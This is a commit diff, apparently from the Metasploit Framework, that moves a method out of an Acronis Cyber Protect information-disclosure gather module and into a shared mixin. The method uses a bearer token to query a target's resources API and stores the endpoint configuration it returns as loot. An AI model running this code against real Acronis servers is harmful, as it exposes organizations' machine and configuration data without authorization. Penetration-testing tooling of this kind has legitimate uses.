moved get_machine_info to the acronis_cyber mixin

h00die-gr3y · Nov 26, 2024 · 18c4e9c · 18c4e9c
1 parent b6595ee
commit 18c4e9c
Show file tree

Hide file tree

Showing 2 changed files with 32 additions and 30 deletions.
diff --git a/lib/msf/core/exploit/remote/http/acronis_cyber.rb b/lib/msf/core/exploit/remote/http/acronis_cyber.rb
@@ -113,4 +113,36 @@ def get_version_info(access_token2)
 
     res_json['backendVersion']
   end
+
+  # return all configured items in json format
+  # @param [access_token2] second access_token
+  # @return [res_json, nil] returns machine info in json format or nil if not successful
+  def get_machine_info(access_token2)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'resources'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Authorization' => "bearer #{access_token2}"
+      },
+      'vars_get' => {
+        'embed' => 'details'
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('items') || res.body.include?('data')
+
+    if datastore['OUTPUT'] == 'json'
+      loot_path = store_loot('acronis.cyber.protect.config', 'application/json', datastore['RHOSTS'], res.body, 'configuration', 'endpoint configuration')
+      print_good("Configuration details are successfully saved in json format to #{loot_path}")
+    end
+
+    # parse json response and get the relevant machine info
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json
+  end
 end
diff --git a/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb b/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb
@@ -67,36 +67,6 @@ def initialize(info = {})
     )
   end
 
-  # return all configured items in json format or return nil if not successful
-  def get_machine_info(access_token2)
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'resources'),
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'headers' => {
-        'X-Requested-With' => 'XMLHttpRequest',
-        'Authorization' => "bearer #{access_token2}"
-      },
-      'vars_get' => {
-        'embed' => 'details'
-      }
-    })
-    return unless res&.code == 200
-    return unless res.body.include?('items') || res.body.include?('data')
-
-    if datastore['OUTPUT'] == 'json'
-      loot_path = store_loot('acronis.cyber.protect.config', 'application/json', datastore['RHOSTS'], res.body, 'configuration', 'endpoint configuration')
-      print_good("Configuration details are successfully saved in json format to #{loot_path}")
-    end
-
-    # parse json response and get the relevant machine info
-    res_json = res.get_json_document
-    return if res_json.blank?
-
-    res_json
-  end
-
   def check
     # initial check on api access
     res = send_request_cgi({